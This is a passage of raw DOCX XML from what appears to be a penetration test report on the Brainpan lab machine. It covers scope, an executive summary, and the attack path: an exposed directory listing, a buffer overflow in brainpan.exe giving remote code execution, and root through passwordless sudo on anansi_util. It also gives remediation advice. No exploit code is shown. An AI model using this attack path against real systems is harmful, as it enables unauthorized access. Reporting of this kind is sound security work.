                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D33794" w14:paraId="12B1E736" w14:textId="77777777" w:rsidTr="003F11B7">
        <w:trPr>
          <w:trHeight w:val="981"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3767" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="490E840F" w14:textId="77777777" w:rsidR="00D33794" w:rsidRPr="00FA1072" w:rsidRDefault="00D33794" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="10"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
                <w:sz w:val="29"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4CED1C80" w14:textId="1A95E9EF" w:rsidR="00D33794" w:rsidRPr="00FA1072" w:rsidRDefault="00BA4545" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="58"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
              </w:rPr>
              <w:t xml:space="preserve">External Black </w:t>
            </w:r>
            <w:r w:rsidR="00644A0C" w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
              </w:rPr>
              <w:t>Box Penetration Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5802" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F6B274D" w14:textId="77777777" w:rsidR="00D33794" w:rsidRPr="00FA1072" w:rsidRDefault="00D33794" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="10"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
                <w:sz w:val="29"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0CCF95C9" w14:textId="7774DEDB" w:rsidR="00D33794" w:rsidRPr="00FA1072" w:rsidRDefault="008416F6" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="58"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
              </w:rPr>
              <w:t>10.10.233.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DFFB604" w14:textId="77777777" w:rsidR="00D33794" w:rsidRDefault="00D33794" w:rsidP="00D33794">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="391"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="Scope_Exclusions"/>
      <w:bookmarkStart w:id="16" w:name="_Toc141061100"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Exclusions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="4052D410" w14:textId="2314CD74" w:rsidR="3EFF00EC" w:rsidRPr="007859A3" w:rsidRDefault="007D5773" w:rsidP="007D5773">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B27F828" w14:textId="77777777" w:rsidR="007D5773" w:rsidRPr="00BC750D" w:rsidRDefault="007D5773" w:rsidP="007D5773">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08BB11F7" w14:textId="77777777" w:rsidR="00B03A74" w:rsidRDefault="00B03A74" w:rsidP="00B03A74">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc141061101"/>
      <w:r>
        <w:t>Client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Allowances</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="4BC1E40F" w14:textId="6AC7B9EC" w:rsidR="007D5773" w:rsidRPr="00BC750D" w:rsidRDefault="00B03A74" w:rsidP="007D5773">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF00069" w14:textId="77777777" w:rsidR="00FE33FA" w:rsidRDefault="00FE33FA" w:rsidP="007D5773">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6526EE84" w14:textId="77777777" w:rsidR="00773836" w:rsidRDefault="00773836" w:rsidP="00332229">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc141061102"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Executive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="287F4E5D" w14:textId="59F9B37E" w:rsidR="00F72C2E" w:rsidRPr="00F72C2E" w:rsidRDefault="008D34E5" w:rsidP="00F72C2E">
      <w:r>
        <w:t>Sh3llsh0ck Sec evaluated Brainpan</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="00133711">
        <w:t xml:space="preserve">external </w:t>
      </w:r>
      <w:r w:rsidR="001E09DC">
        <w:t>security posture through performing a black box penetration test on the given target machine (listed in the scope)</w:t>
      </w:r>
      <w:r w:rsidR="00F367AE">
        <w:t xml:space="preserve"> from June 20</w:t>
      </w:r>
      <w:r w:rsidR="00F367AE" w:rsidRPr="00F367AE">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00F367AE">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001158AB">
        <w:t>2023</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F367AE">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="001158AB">
        <w:t xml:space="preserve"> June 21</w:t>
      </w:r>
      <w:r w:rsidR="001158AB" w:rsidRPr="001158AB">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="001158AB">
        <w:t>, 2023.</w:t>
      </w:r>
      <w:r w:rsidR="00221ED9">
        <w:t xml:space="preserve"> The following sections provide a high-level overview of the attack path, discovered vulnerabilities, </w:t>
      </w:r>
      <w:r w:rsidR="00C57D43">
        <w:t xml:space="preserve">tester recommendations, and </w:t>
      </w:r>
      <w:r w:rsidR="00015591">
        <w:t>security strengths and weaknesses.</w:t>
      </w:r>
      <w:r w:rsidR="001158AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0F254B" w14:textId="307F80A1" w:rsidR="00406DB8" w:rsidRDefault="00F72C2E" w:rsidP="00F72C2E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc141061103"/>
      <w:r>
        <w:t>Testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="6EE5870E" w14:textId="597DED8D" w:rsidR="0072773B" w:rsidRPr="0072773B" w:rsidRDefault="0072773B" w:rsidP="00A64ACA">
      <w:r w:rsidRPr="0072773B">
        <w:t>During the penetration test, Sh3llsh0ck Sec discovered an exposed directory listing (/bin) on the target machine's webserver running on port 10,000. This directory contained a Windows binary named brainpan.exe, which was also found to be listening for connections on port 9999. By leveraging this exposed directory, Sh3llsh0ck Sec obtained a copy of brainpan.exe through the webserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767B0FD4" w14:textId="208C7B5F" w:rsidR="0072773B" w:rsidRPr="0072773B" w:rsidRDefault="0072773B" w:rsidP="00A64ACA">
      <w:r w:rsidRPr="0072773B">
        <w:t xml:space="preserve">The team then performed local reverse engineering on the binary, revealing the presence of a stack-based buffer overflow vulnerability. Exploiting this vulnerability enabled Sh3llsh0ck Sec to achieve Remote Code Execution on the target machine. As a result, they gained access to a user account named "puck," which had </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0072773B">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0072773B">
        <w:t xml:space="preserve"> permissions. Notably, the user "puck" had unrestricted access (no password required) to execute a binary located at "/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0072773B">
        <w:t>anansi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0072773B">
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0072773B">
        <w:t>anansi_util</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0072773B">
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as the root user</w:t>
      </w:r>
      <w:r w:rsidRPr="0072773B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1B4002" w14:textId="57F2B7A2" w:rsidR="0072773B" w:rsidRPr="0072773B" w:rsidRDefault="0072773B" w:rsidP="00A64ACA">
      <w:r w:rsidRPr="0072773B">
        <w:t>By utilizing the "manual" option provided by the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0072773B">
        <w:t>anansi_util</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0072773B">
        <w:t>" binary, Sh3llsh0ck Sec successfully obtained a shell with root privileges on the target machine. This effectively granted them full control over the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8EFA09" w14:textId="76FFF6C2" w:rsidR="00332CF5" w:rsidRPr="0072773B" w:rsidRDefault="0072773B" w:rsidP="00A64ACA">
      <w:r w:rsidRPr="0072773B">
        <w:t xml:space="preserve">These findings demonstrate critical security vulnerabilities within the target environment, allowing unauthorized access and </w:t>
      </w:r>
      <w:r w:rsidR="00800894">
        <w:t xml:space="preserve">full </w:t>
      </w:r>
      <w:r w:rsidRPr="0072773B">
        <w:t>compromise of sensitive information. Immediate attention and remediation of these issues are strongly recommended to mitigate further risks and protect the organization's assets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02380B24" w14:textId="77777777" w:rsidR="005154E3" w:rsidRDefault="005154E3" w:rsidP="005154E3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="100"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc141061104"/>
      <w:r>
        <w:t>Tester</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Notes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="53190FD1" w14:textId="48A0A240" w:rsidR="00A34865" w:rsidRDefault="009C60E9" w:rsidP="3EFF00EC">
      <w:r w:rsidRPr="009C60E9">
        <w:t xml:space="preserve">The penetration test identified </w:t>
      </w:r>
      <w:r w:rsidR="00A67F3A">
        <w:t>three</w:t>
      </w:r>
      <w:r w:rsidRPr="009C60E9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A09EE">
        <w:t xml:space="preserve">main </w:t>
      </w:r>
      <w:r w:rsidRPr="009C60E9">
        <w:t>weak points within the target machine's security infrastructure that</w:t>
      </w:r>
      <w:r w:rsidR="00A67F3A">
        <w:t xml:space="preserve"> heavily contributed to</w:t>
      </w:r>
      <w:r w:rsidRPr="009C60E9">
        <w:t xml:space="preserve"> full compromise of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3A2E82" w14:textId="45AF03F9" w:rsidR="3EFF00EC" w:rsidRDefault="00A34865" w:rsidP="3EFF00EC">
      <w:r>
        <w:t xml:space="preserve">The first weak point was the exposed directory listing which allowed </w:t>
      </w:r>
      <w:r w:rsidR="00F80B78">
        <w:t>our team</w:t>
      </w:r>
      <w:r w:rsidR="00A67F3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E277C9">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="007D6C1D">
        <w:t xml:space="preserve">obtain a copy of the binary </w:t>
      </w:r>
      <w:r w:rsidR="00F80B78">
        <w:t xml:space="preserve">listening on port 9999. This exposed listing allowed </w:t>
      </w:r>
      <w:r w:rsidR="00B64284">
        <w:t>our team to reverse engineer the binary in the first place for further exploitation and initial access to the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCE3E7E" w14:textId="34CBE278" w:rsidR="005606E6" w:rsidRDefault="005606E6" w:rsidP="3EFF00EC">
      <w:r>
        <w:t xml:space="preserve">We recommend that </w:t>
      </w:r>
      <w:r w:rsidR="00676749">
        <w:t xml:space="preserve">Brainpan </w:t>
      </w:r>
      <w:r w:rsidR="00114AD4">
        <w:t xml:space="preserve">implements policies to </w:t>
      </w:r>
      <w:r w:rsidR="00676749">
        <w:t xml:space="preserve">secure any sensitive </w:t>
      </w:r>
      <w:r w:rsidR="00114AD4">
        <w:t xml:space="preserve">directories and to block access to them entirely </w:t>
      </w:r>
      <w:r w:rsidR="005E3B0B">
        <w:t xml:space="preserve">on the public-facing webserver. We also recommend that </w:t>
      </w:r>
      <w:r w:rsidR="00B76A7A">
        <w:t xml:space="preserve">directory listing </w:t>
      </w:r>
      <w:r w:rsidR="009B6D97">
        <w:t>functionality be completely disabled across all public-facing webservers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6162C675" w14:textId="1067787C" w:rsidR="008E2527" w:rsidRDefault="008E2527" w:rsidP="3EFF00EC">
      <w:r>
        <w:t>The second weak</w:t>
      </w:r>
      <w:r w:rsidR="002E4928">
        <w:t xml:space="preserve"> point was the </w:t>
      </w:r>
      <w:r w:rsidR="00A63CAC">
        <w:t>publicly exposed</w:t>
      </w:r>
      <w:r w:rsidR="005E663F">
        <w:t xml:space="preserve"> port </w:t>
      </w:r>
      <w:r w:rsidR="001D039A">
        <w:t xml:space="preserve">9999 </w:t>
      </w:r>
      <w:r w:rsidR="005E663F">
        <w:t>running the vulnerable brainpan binary</w:t>
      </w:r>
      <w:r w:rsidR="005F16CD">
        <w:t>, as it allowed our team to exploit the buffer overflow present in the binary and gain initial access to the target server.</w:t>
      </w:r>
      <w:r w:rsidR="00A63CAC">
        <w:t xml:space="preserve"> The binary itself was vulnerable to a very simple buffer overflow attack which allowed full compromise of the service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D96048" w14:textId="49013FD3" w:rsidR="00567134" w:rsidRDefault="00A63CAC" w:rsidP="3EFF00EC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We recommend that Brain</w:t>
      </w:r>
      <w:r w:rsidR="001D039A">
        <w:t>pan implement</w:t>
      </w:r>
      <w:r w:rsidR="008B6E41">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="001D039A">
        <w:t xml:space="preserve"> policies to </w:t>
      </w:r>
      <w:r w:rsidR="000E6037">
        <w:t xml:space="preserve">restrict inbound access to any ports or services that do not need </w:t>
      </w:r>
      <w:r w:rsidR="00A70FC3">
        <w:t xml:space="preserve">to be publicly accessible </w:t>
      </w:r>
      <w:r w:rsidR="003936E2">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="00A70FC3">
        <w:t xml:space="preserve"> the internet.</w:t>
      </w:r>
      <w:r w:rsidR="00C31DDE">
        <w:t xml:space="preserve"> In addition,</w:t>
      </w:r>
      <w:r w:rsidR="003936E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B6E41">
        <w:t xml:space="preserve">a more thorough </w:t>
      </w:r>
      <w:r w:rsidR="00D40963">
        <w:t>bug testing procedure</w:t>
      </w:r>
      <w:r w:rsidR="00C31DDE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6B80">
        <w:t>should be implemented during the development lifecycl</w:t>
      </w:r>
      <w:r w:rsidR="000D2397">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00567134">
        <w:t xml:space="preserve"> so that critical code vulnerabilities like the buffer overflow in brainpan can be detected</w:t>
      </w:r>
      <w:r w:rsidR="00E126D8">
        <w:t xml:space="preserve"> and resolved</w:t>
      </w:r>
      <w:r w:rsidR="00567134">
        <w:t xml:space="preserve"> before deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E7D3F" w14:textId="3607A20D" w:rsidR="00567134" w:rsidRDefault="002B59A2" w:rsidP="3EFF00EC">
      <w:r>
        <w:t>The third weak point was the</w:t>
      </w:r>
      <w:r w:rsidR="00D456C3">
        <w:t xml:space="preserve"> level of privileged access given to the </w:t>
      </w:r>
      <w:r w:rsidR="00D456C3">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00D456C3">
        <w:t>puck</w:t>
      </w:r>
      <w:r w:rsidR="00D456C3">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00D456C3">
        <w:t xml:space="preserve"> user, which allowed our team to</w:t>
      </w:r>
      <w:r w:rsidR="004D1DF2">
        <w:t xml:space="preserve"> elevate </w:t>
      </w:r>
      <w:r w:rsidR="002E4ED6">
        <w:t xml:space="preserve">our privileges to root on the target system. This was done by abusing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002E4ED6">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002E4ED6">
        <w:t xml:space="preserve"> permissions set for </w:t>
      </w:r>
      <w:r w:rsidR="002E4ED6">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="002E4ED6">
        <w:t>puck</w:t>
      </w:r>
      <w:r w:rsidR="00A65B94">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A65B94">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145B36E4" w14:textId="48F12C92" w:rsidR="3EFF00EC" w:rsidRDefault="0029165E" w:rsidP="3EFF00EC">
      <w:r w:rsidRPr="0029165E">
        <w:t>We recommend that Brainpan implement Zero Trust policies, such as the principle of least privilege, systemwide to ensure the appropriate level of access is granted to each user and system component</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="0029165E">
        <w:t>Specifically, the permissions assigned to the "puck" user should be reassessed and restricted to only the necessary privileges required for its intended task</w:t>
      </w:r>
      <w:r w:rsidR="00EB6716">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EB6716" w:rsidRPr="00EB6716">
        <w:t>Additionally, regular reviews of access permissions should be conducted to ensure ongoing adherence to the principle of least privilege and maintain a secure environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5924882B" w14:textId="77777777" w:rsidR="004A0A96" w:rsidRDefault="004A0A96" w:rsidP="005D54FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc141061105"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Card</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="6988AF7D" w14:textId="77777777" w:rsidR="004A0A96" w:rsidRDefault="004A0A96" w:rsidP="004A0A96">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_bookmark20"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>illustrate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>impact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>recommended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>remediations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC14566" w14:textId="0D19A3BB" w:rsidR="004A0A96" w:rsidRDefault="00D610C2" w:rsidP="004A0A96">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc141061106"/>
      <w:r>
        <w:t xml:space="preserve">Black Box Penetration </w:t>
      </w:r>
      <w:r w:rsidR="004A0A96">
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidR="004A0A96">
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A0A96">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="00901E9E" w14:textId="77777777" w:rsidR="004A0A96" w:rsidRDefault="004A0A96" w:rsidP="004A0A96">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic"/>
          <w:b/>
          <w:sz w:val="22"/>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5"/>
        <w:gridCol w:w="2014"/>
        <w:gridCol w:w="2015"/>
        <w:gridCol w:w="2015"/>
        <w:gridCol w:w="2014"/>
      </w:tblGrid>
      <w:tr w:rsidR="004A0A96" w14:paraId="4E62B37B" w14:textId="77777777" w:rsidTr="00230918">
        <w:trPr>
          <w:trHeight w:val="1141"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="33F34E98" w14:textId="77777777" w:rsidR="004A0A96" w:rsidRDefault="004A0A96" w:rsidP="00230918">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="181AE3BB" w14:textId="3C7F8415" w:rsidR="004A0A96" w:rsidRDefault="00C477FD" w:rsidP="00230918">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="509" w:right="492"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2014" w:type="dxa"/>
